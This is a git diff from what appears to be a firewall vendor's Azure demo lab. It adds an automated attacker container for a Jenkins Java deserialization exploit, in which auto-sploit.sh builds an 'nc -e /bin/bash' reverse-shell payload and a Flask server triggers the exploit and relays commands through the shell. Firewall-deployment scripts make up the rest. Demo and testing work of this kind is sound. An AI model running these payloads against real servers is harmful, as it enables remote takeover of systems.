file +} diff --git a/azure/Jenkins_proj-master/attacker/Dockerfile b/azure/Jenkins_proj-master/attacker/Dockerfile new file mode 100644 index 00000000..e6123ab4 --- /dev/null +++ b/azure/Jenkins_proj-master/attacker/Dockerfile @@ -0,0 +1,42 @@ +FROM openjdk:8-jdk + +MAINTAINER jamie-b + +RUN apt-get update && apt-get install -y git curl wget netcat nmap net-tools sudo python3 python3-pip && rm -rf /var/lib/apt/lists/* + +RUN echo 'root:paloalto' | chpasswd + +ENV TINI_VERSION v0.14.0 +ADD https://github.com/wwce/terraform/blob/master/azure/Jenkins_proj-master/jenkins/tini?raw=true /bin/tini +RUN chmod +x /bin/tini + +RUN set -ex \ + && wget https://raw.githubusercontent.com/wwce/terraform/master/azure/Jenkins_proj-master/payload/commons-beanutils-1.8.3.jar -O ~/commons-beanutils-1.8.3.jar -q --progress=bar:force:noscroll --show-progress \ + && wget https://raw.githubusercontent.com/wwce/terraform/master/azure/Jenkins_proj-master/payload/commons-collections-3.2.1.jar -O ~/commons-collections-3.2.1.jar -q --progress=bar:force:noscroll --show-progress \ + && wget https://raw.githubusercontent.com/wwce/terraform/master/azure/Jenkins_proj-master/payload/commons-lang-2.6.jar -O ~/commons-lang-2.6.jar -q --progress=bar:force:noscroll --show-progress \ + && wget https://raw.githubusercontent.com/wwce/terraform/master/azure/Jenkins_proj-master/payload/commons-logging-1.2.jar -O ~/commons-logging-1.2.jar -q --progress=bar:force:noscroll --show-progress \ + && wget https://raw.githubusercontent.com/wwce/terraform/master/azure/Jenkins_proj-master/payload/ezmorph-1.0.6.jar -O ~/ezmorph-1.0.6.jar -q --progress=bar:force:noscroll --show-progress \ + && wget https://raw.githubusercontent.com/wwce/terraform/master/azure/Jenkins_proj-master/payload/json-lib-2.4-jenkins-2.jar -O ~/json-lib-2.4-jenkins-2.jar -q --progress=bar:force:noscroll --show-progress \ + && wget https://raw.githubusercontent.com/wwce/terraform/master/azure/Jenkins_proj-master/payload/payload.jar -O ~/payload.jar -q --progress=bar:force:noscroll --show-progress \ + && wget https://raw.githubusercontent.com/wwce/terraform/master/azure/Jenkins_proj-master/payload/exploit.py -O ~/exploit.py -q --progress=bar:force:noscroll --show-progress + +EXPOSE 443 5000 + +RUN pip3 install requests flask pexpect + +COPY run.sh /usr/local/bin/run.sh +COPY exp-server.py /root/exp-server.py + +RUN chmod +x /usr/local/bin/run.sh + +COPY auto-sploit.sh /root/auto-sploit.sh + +RUN chmod +x /root/auto-sploit.sh + +USER root + 
+ENTRYPOINT ["/bin/tini", "--"] +ENV FLASK_APP=/root/exp-server.py + +# CMD ["/usr/local/bin/run.sh"] +CMD ["/usr/local/bin/flask", "run", "--host=0.0.0.0"] diff --git a/azure/Jenkins_proj-master/attacker/auto-sploit.sh b/azure/Jenkins_proj-master/attacker/auto-sploit.sh new file mode 100644 index 00000000..97c6dc3d --- /dev/null +++ b/azure/Jenkins_proj-master/attacker/auto-sploit.sh @@ -0,0 +1,31 @@ +#! /bin/bash + +echo +echo "*******************************************************************" +echo +echo "Open another terminal window and run a netcat listener: nc -lvp 443" +echo +echo "Run the following command to spawn a shell once the reverse connection establishes:" +echo +echo "python -c 'import pty; pty.spawn(\"/bin/bash\")'" +echo +read -n 1 -s -r -p "Once the above is complete - press any key to continue" + +echo +echo "Enter Attacker IP Address:" +echo + +read attacker + +echo "Creating Payload with IP address" $attacker +echo + +java -jar payload.jar payload.ser "nc -e /bin/bash $attacker 443" + +echo "Payload successfully created and saved as 'payload.ser'" +echo + +echo "Executing exploit..." +echo + +python3 exploit.py diff --git a/azure/Jenkins_proj-master/attacker/docker-compose.yml b/azure/Jenkins_proj-master/attacker/docker-compose.yml new file mode 100644 index 00000000..02cdb71b --- /dev/null +++ b/azure/Jenkins_proj-master/attacker/docker-compose.yml @@ -0,0 +1,8 @@ +version: '3' +services: + attacker: + build: . + container_name: attacker + ports: + - "443:443" + - "5000:5000" diff --git a/azure/Jenkins_proj-master/attacker/exp-server.py b/azure/Jenkins_proj-master/attacker/exp-server.py new file mode 100644 index 00000000..19a4a77b --- /dev/null +++ b/azure/Jenkins_proj-master/attacker/exp-server.py @@ -0,0 +1,175 @@ +# Copyright (c) 2018, Palo Alto Networks +# +# Permission to use, copy, modify, and/or distribute this software for any +# purpose with or without fee is hereby granted, provided that the above +# copyright notice and this permission notice appear in all copies. +# +# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES +# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF +# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR +# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES +# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN +# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF +# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. + +""" +Palo Alto Networks - demo-launcher +Super simple App to expose a RESTful API to launch a couple of scripts +This software is provided without support, warranty, or guarantee. +Use at your own risk. +""" + +import pexpect +from flask import Flask +from flask import request +import os +import time + +app = Flask(__name__) + + +@app.route("/") +def hello(): + return "Good Day!" 
+ + +@app.route("/launch", methods=['POST']) +def launch_sploit(): + """ + Accepts a JSON payload with the following structure: + { + "target": "nlb-something.fqdn.com", + "attacker": "1.2.3.4" + } + If the payload parses correctly, then launch a reverse shell listener using pexpect.spawn + then spawn the auto-sploit.sh tool and enter the target and attacker info again using pexpect + :return: Simple String response for now + """ + if request.is_json: + print(request.data) + payload = request.get_json() + print(request.mimetype) + print(request.content_type) + print(request.accept_mimetypes) + print(payload) + print(type(payload)) + target_ip = payload.get('target', '') + attacker_ip = payload.get('attacker', '') + if target_ip == "" or attacker_ip == "": + print('Payload is all wrong!') + print(request.payload) + return 'ERROR' + + exe = '/root/auto-sploit.sh' + if not os.path.exists(exe): + return 500, 'launch script does not exist' + + print('Launching auto-sploit.sh') + child = pexpect.spawn('/root/auto-sploit.sh') + child.delaybeforesend = 2 + found_index = child.expect(['press any key to continue', pexpect.EOF, pexpect.TIMEOUT]) + if found_index == 0: + print('launching listener process') + _launch_listener() + child.send('\n') + else: + return 'ERROR - Could not press key to continue' + + found_index = child.expect(['Enter Attacker IP Address', pexpect.EOF, pexpect.TIMEOUT]) + if found_index == 0: + print('Sending attacker ip :::' + attacker_ip + ':::') + child.sendline(attacker_ip) + else: + return 'ERROR - Could not enter attacker IP' + + found_index = child.expect(['Enter Jenkins Target IP Address', pexpect.EOF, pexpect.TIMEOUT]) + if found_index == 0: + print(child.before) + print('Sending target ip') + child.sendline(target_ip) + else: + print(child.before) + return 'ERROR - Could not enter jenkins IP' + + found_index = child.expect(['pwn', pexpect.EOF, pexpect.TIMEOUT]) + if found_index == 0: + print('PWN') + print(child) + time.sleep(2) + return 'SUCCESS - auto-sploit launched!' + + else: + return 'No Bueno - No JSON payload detected' + + +@app.route("/send", methods=['POST']) +def send_cmd(): + if request.is_json: + data = request.get_json() + cli = data.get('cli', '') + if cli == '': + return 'No Bueno - Invalid JSON payload' + + if 'listener' in app.config: + print('We have a listener already up!') + listener = app.config.get('listener', '') + if not hasattr(listener, 'isalive') or not listener.isalive(): + return 'No Bueno - Listener does not appear to be active' + + print('Sending initial command to see where we are!') + listener.sendline('echo $SHLVL\n') + found_index = listener.expect(['1', 'jenkins@', 'root@', pexpect.EOF, pexpect.TIMEOUT]) + print(found_index) + if found_index == 0: + # no prompt yet + print('Great, trying to get a prompt now') + listener.sendline("python -c 'import pty; pty.spawn(\"/bin/bash\")'") + + if found_index > 2: + print(listener.before) + return 'Someting is wrong with the listener connection!' + + # listener.sendline(cli) + # print(listener) + found_index = listener.expect(['jenkins@.*$', 'root@.*#', pexpect.EOF, pexpect.TIMEOUT]) + print('Found index is now: ' + str(found_index)) + if found_index > 1: + print(listener) + return 'Someting is wrong with the listener connection!' 
+ listener.sendline(cli) + found_index = listener.expect(['jenkins@.*$', 'root@.*#', pexpect.EOF, pexpect.TIMEOUT]) + print('Found index after cli is now: ' + str(found_index)) + if found_index > 1: + print(listener) + return 'Someting is wrong with the listener connection!' + print(listener) + return listener.before + + else: + return 'NOPE' + else: + return 'NOWAYJOSE' + + +def _launch_listener(): + if 'listener' not in app.config: + listener = pexpect.spawn('nc -lvp 443') + found_index = listener.expect(['listening', pexpect.EOF, pexpect.TIMEOUT]) + if found_index != 0: + return False + app.config['listener'] = listener + print('Launched and ready to rock') + return True + else: + listener = app.config['listener'] + if hasattr(listener, 'isalive') and listener.isalive(): + return True + else: + listener = pexpect.spawn('nc -lvp 443') + found_index = listener.expect(['listening', pexpect.EOF, pexpect.TIMEOUT]) + if found_index != 0: + return False + app.config['listener'] = listener + return True + + diff --git a/azure/Jenkins_proj-master/attacker/run.sh b/azure/Jenkins_proj-master/attacker/run.sh new file mode 100644 index 00000000..bc9b9de7 --- /dev/null +++ b/azure/Jenkins_proj-master/attacker/run.sh @@ -0,0 +1,11 @@ +#! /bin/bash -e + +# Running nc on an unexposed port to keep the container up + +if [[ $# -lt 1 ]] || [[ "$1" == "--"* ]]; then + + exec nc -l -p 56789 "$@" + +fi + +exec "$@" diff --git a/azure/Jenkins_proj-master/azure_login.py b/azure/Jenkins_proj-master/azure_login.py index b21948f2..bbe85a41 100644 --- a/azure/Jenkins_proj-master/azure_login.py +++ b/azure/Jenkins_proj-master/azure_login.py @@ -7,3 +7,4 @@ print('Logging in to Azure using device code') get_default_cli().invoke(['login', "--use-device-code"], out_file=sys.stdout) +pass \ No newline at end of file diff --git a/azure/Jenkins_proj-master/deploy-v2.html b/azure/Jenkins_proj-master/deploy-v2.html new file mode 100644 index 00000000..123a542a --- /dev/null +++ b/azure/Jenkins_proj-master/deploy-v2.html @@ -0,0 +1,185 @@ + +Python: module deploy-v2 + + + + + +
 
+ 
deploy-v2
index
/Users/jharris/Documents/PycharmProjects/terraform/azure/Jenkins_proj-master/deploy-v2.py
+

# Copyright (c) 2018, Palo Alto Networks
+#
+# Permission to use, copy, modify, and/or distribute this software for any
+# purpose with or without fee is hereby granted, provided that the above
+# copyright notice and this permission notice appear in all copies.
+#
+# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
+# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
+# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
+# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
+# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
+# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.

+# Author: Justin Harris jharris@paloaltonetworks.com

+Usage

+python deploy.py -u <fw username> -p <fw password> -r <resource group> -j <azure region>

+

+ + + + + +
 
+Modules
xml.etree.ElementTree
+argparse
+pandevice.firewall
+json
+
logging
+os
+requests
+subprocess
+
sys
+time
+urllib3
+uuid
+
xmltodict
+

+ + + + + +
 
+Classes
+
+builtins.Exception(builtins.BaseException)
+    DeployRequestException

+ + + + + + + +
 
+class DeployRequestException(builtins.Exception)
   Common base class for all non-exit exceptions.
 
 
Method resolution order:
+    DeployRequestException
+    builtins.Exception
+    builtins.BaseException
+    builtins.object
+
+Data descriptors defined here:
+
__weakref__
+
list of weak references to the object (if defined)
+
+
+Methods inherited from builtins.Exception:
+
__init__(self, /, *args, **kwargs)
Initialize self.  See help(type(self)) for accurate signature.
+ +
__new__(*args, **kwargs) from builtins.type
Create and return a new object.  See help(type) for accurate signature.
+ +
+Methods inherited from builtins.BaseException:
+
__delattr__(self, name, /)
Implement delattr(self, name).
+ +
__getattribute__(self, name, /)
Return getattr(self, name).
+ +
__reduce__(...)
helper for pickle
+ +
__repr__(self, /)
Return repr(self).
+ +
__setattr__(self, name, value, /)
Implement setattr(self, name, value).
+ +
__setstate__(...)
+ +
__str__(self, /)
Return str(self).
+ +
with_traceback(...)
Exception.with_traceback(tb) -- set self.__traceback__ to tb and return self.
+ +
+Data descriptors inherited from builtins.BaseException:
+
__cause__
+
exception cause
+
+
__context__
+
exception context
+
+
__dict__
+
+
__suppress_context__
+
+
__traceback__
+
+
args
+
+

+ + + + + +
 
+Functions
apply_tf(working_dir, vars, description)
Handles Terraform operations and returns the variables defined in outputs.tf as a dict.
+:param working_dir: Directory that contains the tf files
+:param vars: Additional variables passed in to override defaults equivalent to -var
+:param description: Description of the deployment for logging purposes
+:return:    return_code - 0 for success or other for failure
+            outputs - Dictionary of the terraform outputs defined in the outputs.tf file
+
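A condensed sketch of the pattern the apply_tf helper described above wraps, using the same python_terraform calls that appear in the new deploy.py; the variable values in the usage comment are placeholders:

# Sketch of apply_tf: init the working dir, apply with auto-approve, return the outputs dict.
from python_terraform import Terraform

def apply_tf(working_dir, tf_vars, description):
    tf = Terraform(working_dir=working_dir)
    tf.cmd('init')
    return_code, stdout, stderr = tf.apply(vars=tf_vars, capture_output=False,
                                           skip_plan=True, **{"auto-approve": True})
    outputs = tf.output()  # dict keyed by the names defined in outputs.tf
    print('{} finished with return code {}'.format(description, return_code))
    return return_code, outputs

# rc, outputs = apply_tf('./WebInBootstrap',
#                        {'RG_Name': 'demo-rg', 'Azure_Region': 'centralus'}, 'WebInBootstrap')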
create_azure_fileshare(share_prefix, account_name, account_key)
Generate a unique share name to avoid overlaps in shared infra
+:param share_prefix:
+:param account_name:
+:param account_key:
+:return:
+
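A sketch of what create_azure_fileshare does, using the legacy azure.storage.file.FileService client that deploy.py imports; the exact share-naming scheme here is an assumption:

# Sketch only: create a uniquely named Azure file share for the bootstrap content.
import uuid
from azure.storage.file import FileService

def create_azure_fileshare(share_prefix, account_name, account_key):
    share_name = "{}-{}".format(share_prefix, str(uuid.uuid4())[:8])  # assumed suffix scheme
    file_service = FileService(account_name=account_name, account_key=account_key)
    file_service.create_share(share_name)
    return share_name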
getApiKey(hostname, username, password)
Generates a Palo Alto Networks API key from username and password credentials
+:param hostname: IP address of firewall
+:param username:
+:param password:
+:return: api_key API key for firewall
+
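A sketch of the PAN-OS key generation call getApiKey performs; the keygen endpoint returns the key inside the <result><key> element of the XML response:

# Sketch of getApiKey: request type=keygen and pull the key out of the XML reply.
import xml.etree.ElementTree as ET
import requests

def get_api_key(hostname, username, password):
    call = "https://{}/api/?type=keygen&user={}&password={}".format(hostname, username, password)
    r = requests.get(call, verify=False, timeout=5)
    return ET.fromstring(r.text).find('./result/key').text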
getFirewallStatus(fwIP, api_key)
+
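The op command body used by getFirewallStatus was stripped from the pasted diff; a common readiness probe for a freshly launched VM-Series is the show chassis-ready op command, so the sketch below assumes that check:

# Sketch only: ask the firewall whether the dataplane is ready (assumed probe command).
import xml.etree.ElementTree as ET
import requests

def get_firewall_status(fw_ip, api_key):
    cmd = "<show><chassis-ready></chassis-ready></show>"  # assumed op command
    call = "https://{}/api/?type=op&cmd={}&key={}".format(fw_ip, cmd, api_key)
    try:
        tree = ET.fromstring(requests.get(call, verify=False, timeout=5).text)
    except requests.exceptions.RequestException:
        return 'no'  # management plane not answering yet
    return (tree.findtext('./result') or 'no').strip()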
getServerStatus(IP)
Gets the server status by sending an HTTP request and checking for a 200 response code
+
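A sketch of the polling loop getServerStatus describes: retry an HTTP GET until a 200 comes back or the attempt budget runs out (the 12 attempts x 10 seconds mirror the values in the new deploy.py):

# Sketch of getServerStatus: poll the load balancer address until the app answers with a 200.
import time
import requests

def get_server_status(address, max_count=12):
    url = "http://{}".format(address)
    for _ in range(max_count):
        time.sleep(10)
        try:
            if requests.get(url, timeout=5).status_code == 200:
                return 'server_up'
        except requests.exceptions.RequestException:
            pass
    return 'server_down'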
main(username, password, rg_name, azure_region)
Main function
+:param username:
+:param password:
+:param rg_name: Resource group name prefix
+:param azure_region: Region
+:return:
+
send_request(call)
Handles sending requests to API
+:param call: url
+:return: Returns the result of the call. A response is returned for codes between 200 and 400.
+         If a 200 response code is specifically required, check the value in the response.
+
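A sketch of send_request as the new deploy.py implements it: a browser-style User-Agent header, raise_for_status, and every requests failure surfaced as one DeployRequestException (the UA string is shortened here):

# Sketch of send_request: wrap requests.get and normalise failures into one exception type.
import requests

class DeployRequestException(Exception):
    pass

def send_request(call):
    headers = {'Accept-Encoding': 'None',
               'User-Agent': 'Mozilla/5.0'}  # deploy.py sends a full desktop-browser UA string
    try:
        r = requests.get(call, headers=headers, verify=False, timeout=5)
        r.raise_for_status()
    except requests.exceptions.RequestException as err:
        # The firewall can return 5xx while rebooting; callers catch and retry.
        raise DeployRequestException("Request Error: {}".format(err))
    return r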
update_fw(fwMgtIP, api_key)
Applies the latest App-ID, Threat and AV updates to the firewall after launch
+:param fwMgtIP: Firewall management IP
+:param api_key: API key
+
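update_fw (above) requests a content or AV download/install and then polls the returned job id until it reports FIN. The op command bodies were stripped from the pasted XML, so this sketch only shows the job-polling half, assuming the conventional show jobs id form and the 45-second interval used in deploy.py:

# Sketch only: poll a PAN-OS job until it finishes. The show-jobs XML is the standard form;
# the download/install commands that create the job are issued elsewhere in update_fw.
import time
import xml.etree.ElementTree as ET
import requests

def wait_for_job(fw_mgt_ip, api_key, jobid, poll_interval=45):
    cmd = "<show><jobs><id>{}</id></jobs></show>".format(jobid)
    call = "https://{}/api/?type=op&cmd={}&key={}".format(fw_mgt_ip, cmd, api_key)
    while True:
        time.sleep(poll_interval)
        tree = ET.fromstring(requests.get(call, verify=False, timeout=5).text)
        if tree.attrib.get('status') == 'success' and tree.findtext('./result/job/status') == 'FIN':
            return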
update_status(key, value)
For tracking purposes. Writes responses to a file.
+:param key:
+:param value:
+:return:
+
walkdict(d, key)
Finds a key in a dict or nested dict and returns the value associated with it
+:param d: dict or nested dict
+:param key: key value
+:return: value associated with key
+
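A sketch matching the walkdict implementation added to deploy.py: a depth-first search of the OrderedDict that xmltodict produces, used to find the job id in an API reply:

# Sketch of walkdict: return the value of the first occurrence of a key in a nested OrderedDict.
from collections import OrderedDict

def walkdict(d, match):
    for key, value in d.items():
        if key == match:
            return value
        if isinstance(value, OrderedDict):
            found = walkdict(value, match)
            if found is not None:
                return found
    return None

# walkdict(OrderedDict(response=OrderedDict(result=OrderedDict(job='42'))), 'job')  -> '42'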
write_status_file(message_dict)
Writes the deployment state to a dict and outputs to file for status tracking
+

+ + + + + +
 
+Data
+formatter = <logging.Formatter object>
+handler = <StreamHandler <stderr> (NOTSET)>
+logger = <RootLogger root (INFO)>
+status_output = {}
+ \ No newline at end of file diff --git a/azure/Jenkins_proj-master/deploy.py b/azure/Jenkins_proj-master/deploy.py index 6be3620b..6328d84e 100644 --- a/azure/Jenkins_proj-master/deploy.py +++ b/azure/Jenkins_proj-master/deploy.py @@ -18,7 +18,7 @@ Usage -python deploy.py -u -p' +python deploy.py --username -p -r -j """ @@ -31,15 +31,19 @@ import time import uuid import xml.etree.ElementTree as ET - +import xmltodict import requests import urllib3 + from azure.common import AzureException from azure.storage.file import FileService + + from pandevice import firewall from python_terraform import Terraform +from collections import OrderedDict + -# from . import cache_utils urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) _archive_dir = './WebInDeploy/bootstrap' @@ -51,19 +55,30 @@ formatter = logging.Formatter('%(levelname)-8s %(message)s') handler.setFormatter(formatter) logger.addHandler(handler) -logger.setLevel(logging.INFO) + # global var to keep status output status_output = dict() def send_request(call): + + """ + Handles sending requests to API + :param call: url + :return: Retruns result of call. Will return response for codes between 200 and 400. + If 200 response code is required check value in response + """ + headers = {'Accept-Encoding' : 'None', + 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) ' + 'AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'} + try: - r = requests.get(call, verify=False, timeout=5) + r = requests.get(call, headers = headers, verify=False, timeout=5) r.raise_for_status() except requests.exceptions.HTTPError as errh: ''' - Firewall may return 5xx error when rebooting. Need to handle a 5xx response + Firewall may return 5xx error when rebooting. Need to handle a 5xx response ''' logger.debug("DeployRequestException Http Error:") raise DeployRequestException("Http Error:") @@ -83,165 +98,210 @@ def send_request(call): class DeployRequestException(Exception): pass +def walkdict(dict, match): + """ + Finds a key in a dict or nested dict and returns the value associated with it + :param d: dict or nested dict + :param key: key value + :return: value associated with key + """ + for key, v in dict.items(): + if key == match: + jobid = v + return jobid + elif isinstance(v, OrderedDict): + found = walkdict(v, match) + if found is not None: + return found + + def update_fw(fwMgtIP, api_key): + """ + Applies latest AppID, Threat and AV updates to firewall after launch + :param fwMgtIP: Firewall management IP + :param api_key: API key + + """ # # Download latest applications and threats + type = "op" cmd = "" call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key) - try: - r = send_request(call) - except DeployRequestException: - logger.debug("failed to get jobid this time. Try again") - else: - tree = ET.fromstring(r.text) - jobid = tree[0][1].text - print("Download latest Applications and Threats update - " + str(jobid)) + getjobid = 0 + jobid = '' + key = 'job' + + # FIXME - Remove Duplicate code for parsing jobid + + while getjobid == 0: + try: + r = send_request(call) + logger.info('Got response {} to request for content upgrade '.format(r.text)) + except: + DeployRequestException + logger.info("Didn't get http 200 response. 
Try again") + else: + try: + dict = xmltodict.parse(r.text) + if isinstance(dict, OrderedDict): + jobid = walkdict(dict, key) + except Exception as err: + logger.info("Got exception {} trying to parse jobid from Dict".format(err)) + if not jobid: + logger.info('Got http 200 response but didnt get jobid') + time.sleep(30) + else: + getjobid = 1 + + # FIXME - Remove Duplicate code for showing job status + completed = 0 - while completed == 0: - time.sleep(10) + while (completed == 0): + time.sleep(45) call = "https://%s/api/?type=op&cmd=%s&key=%s" % (fwMgtIP, jobid, api_key) try: r = send_request(call) - logger.info('Response to show jobs was {}'.format(r.text)) - if 'not found' in r.text: - raise DeployRequestException(r.text) - - except DeployRequestException: + logger.info('Got Response {} to show jobs '.format(r.text)) + except: + DeployRequestException logger.debug("failed to get jobid this time. Try again") else: tree = ET.fromstring(r.text) if tree.attrib['status'] == 'success': - - if (tree[0][0][5].text == 'FIN'): - logger.debug("APP+TP download Complete ") - completed = 1 - else: + try: + if (tree[0][0][5].text == 'FIN'): + logger.debug("APP+TP download Complete ") + completed = 1 print("Download latest Applications and Threats update") status = "APP+TP download Status - " + str(tree[0][0][5].text) + " " + str( tree[0][0][12].text) + "% complete" print('{0}\r'.format(status)) + except: + logger.info('Checking job is complete') + completed = 1 + else: + logger.info('Unable to determine job status') + completed = 1 - # Install latest applications and threats without committing - time.sleep(1) + # Install latest content update type = "op" cmd = "latestno" call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key) - try: - r = send_request(call) - except: - DeployRequestException - logger.debug("Requested content install but got response{}".format(r)) - else: - print("request for content upgrade response was {}".format(r.text)) - tree = ET.fromstring(r.text) - if tree.attrib['status'] == 'success': - ''' - Check that we were able to schedule the install - Valid response would contain - - Invalid response would contain - - ''' - jobid = tree[0][1].text - print("Install latest Applications and Threats update - " + str(jobid)) - - completed = 0 - while (completed == 0): - time.sleep(10) - call = "https://%s/api/?type=op&cmd=%s&key=%s" % ( - fwMgtIP, jobid, api_key) - r = send_request(call) - tree = ET.fromstring(r.text) - if tree.attrib['status'] == 'success': + getjobid = 0 + jobid = '' + key = 'job' + + while getjobid == 0: + try: + r = send_request(call) + logger.info('Got response {} to request for content upgrade '.format(r.text)) + except: + DeployRequestException + logger.info("Didn't get http 200 response. Try again") + else: + try: + dict = xmltodict.parse(r.text) + if isinstance(dict, OrderedDict): + jobid = walkdict(dict, key) + except Exception as err: + logger.info("Got exception {} trying to parse jobid from Dict".format(err)) + if not jobid: + logger.info('Got http 200 response but didnt get jobid') + time.sleep(30) + else: + getjobid = 1 + completed = 0 + while (completed == 0): + time.sleep(45) + call = "https://%s/api/?type=op&cmd=%s&key=%s" % (fwMgtIP, jobid, api_key) + try: + r = send_request(call) + logger.info('Got Response {} to show jobs '.format(r.text)) + except: + DeployRequestException + logger.debug("failed to get jobid this time. 
Try again") + else: + tree = ET.fromstring(r.text) + if tree.attrib['status'] == 'success': + try: if (tree[0][0][5].text == 'FIN'): - logger.debug("APP+TP install Complete ") + logger.debug("APP+TP Install Complete ") completed = 1 - else: - print("tree value {}".format(tree[0][0][5].text)) - status = "APP+TP install Status - " + str(tree[0][0][5].text) + " " + str( - tree[0][0][12].text) + "% complete" - print('{0}\r'.format(status)) - else: - logger.debug("Unable to schedule install") + print("Install latest Applications and Threats update") + status = "APP+TP Install Status - " + str(tree[0][0][5].text) + " " + str( + tree[0][0][12].text) + "% complete" + print('{0}\r'.format(status)) + except: + logger.info('Checking job is complete') + completed = 1 + else: + logger.info('Unable to determine job status') + completed = 1 + - # download latest anti-virus update + # Download latest anti-virus update without committing + getjobid = 0 + jobid = '' type = "op" cmd = "" - call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key) - try: - r = send_request(call) - except: - DeployRequestException - logger.debug("Requested AV download but got response{}".format(DeployRequestException)) - else: - tree = ET.fromstring(r.text) - jobid = tree[0][1].text - logger.debug("Got Jobid {} for download latest Anti-Virus update".format(str(jobid))) + key = 'job' + while getjobid == 0: + try: + call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key) + r = send_request(call) + logger.info('Got response to request AV install {}'.format(r.text)) + except: + DeployRequestException + logger.info("Didn't get http 200 response. Try again") + else: + try: + dict = xmltodict.parse(r.text) + if isinstance(dict, OrderedDict): + jobid = walkdict(dict, key) + except Exception as err: + logger.info("Got exception {} trying to parse jobid from Dict".format(err)) + if not jobid: + logger.info('Got http 200 response but didnt get jobid') + time.sleep(30) + else: + getjobid = 1 completed = 0 while (completed == 0): - time.sleep(10) - call = "https://%s/api/?type=op&cmd=%s&key=%s" % (fwMgtIP, jobid, api_key) + time.sleep(45) + call = "https://%s/api/?type=op&cmd=%s&key=%s" % ( + fwMgtIP, jobid, api_key) r = send_request(call) - tree = ET.fromstring(r.text) logger.debug('Got response for show job {}'.format(r.text)) if tree.attrib['status'] == 'success': - - if (tree[0][0][5].text == 'FIN'): - logger.debug( - "AV download Complete - ") - completed = 1 - else: - status = "AV download Status - " + str(tree[0][0][5].text) + " " + str( - tree[0][0][12].text) + "% complete" - print('{0}\r'.format(status)) - - # install latest anti-virus update without committing - type = "op" - cmd = "latestno" - call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key) - r = send_request(call) - tree = ET.fromstring(r.text) - logger.debug('Got response for show job {}'.format(r.text)) - if tree.attrib['status'] == 'success': - ''' - Check that we were able to schedule the install - Valid response would contain - - Invalid response would contain - - ''' - jobid = tree[0][1].text - print("Install latest Anti-Virus update - " + str(jobid)) - - completed = 0 - while (completed == 0): - time.sleep(10) - call = "https://%s/api/?type=op&cmd=%s&key=%s" % ( - fwMgtIP, jobid, api_key) - r = send_request(call) - tree = ET.fromstring(r.text) - - logger.debug('Got response for show job {}'.format(r.text)) - if tree.attrib['status'] == 'success': - + try: if (tree[0][0][5].text == 'FIN'): - 
logger.debug("AV install Status Complete ") + logger.info("AV install Status Complete ") completed = 1 else: status = "Status - " + str(tree[0][0][5].text) + " " + str(tree[0][0][12].text) + "% complete" print('{0}\r'.format(status)) - else: - logger.debug("Unable to schedule install") + except: + logger.info('Could not parse output from show jobs, with jobid {}'.format(jobid)) + completed = 1 + else: + logger.info('Unable to determine job status') + completed = 1 def getApiKey(hostname, username, password): - ''' - Generate the API key from username / password - ''' + + """ + Generates a Paloaltonetworks api key from username and password credentials + :param hostname: Ip address of firewall + :param username: + :param password: + :return: api_key API key for firewall + """ + print("getting api key") call = "https://%s/api/?type=keygen&user=%s&password=%s" % (hostname, username, password) @@ -277,7 +337,6 @@ def getFirewallStatus(fwIP, api_key): :param fwMgtIP: IP Address of firewall interface to be probed :param api_key: Panos API key """ - global gcontext url = "https://%s/api/?type=op&cmd=&key=%s" % (fwip, api_key) # Send command to fw and see if it times out or we get a response @@ -326,6 +385,12 @@ def getFirewallStatus(fwIP, api_key): def update_status(key, value): + """ + For tracking purposes. Write responses to file. + :param key: + :param value: + :return: + """ global status_output if type(status_output) is not dict: @@ -355,7 +420,13 @@ def write_status_file(message_dict): def create_azure_fileshare(share_prefix, account_name, account_key): - # generate a unique share name to avoid overlaps in shared infra + """ + Generate a unique share name to avoid overlaps in shared infra + :param share_prefix: + :param account_name: + :param account_key: + :return: + """ # FIXME - Need to remove hardcoded directoty link below @@ -407,6 +478,7 @@ def create_azure_fileshare(share_prefix, account_name, account_key): def getServerStatus(IP): """ Gets the server status by sending an HTTP request and checking for a 200 response code + """ global gcontext @@ -414,9 +486,10 @@ def getServerStatus(IP): logger.info('URL request is {}'.format(call)) # Send command to fw and see if it times out or we get a response count = 0 - max_count = 15 + max_count = 12 while True: if count < max_count: + time.sleep(10) try: count = count + 1 r = send_request(call) @@ -430,24 +503,17 @@ def getServerStatus(IP): return 'server_down' -def main(username, password, rg_name): - username = username - password = password - - WebInBootstrap_vars = { - 'RG_Name': rg_name - } - - WebInDeploy_vars = { - 'Admin_Username': username, - 'Admin_Password': password - } +def apply_tf(working_dir, vars, description): - WebInFWConf_vars = { - 'Admin_Username': username, - 'Admin_Password': password - } + """ + Handles terraform operations and returns variables in outputs.tf as a dict. 
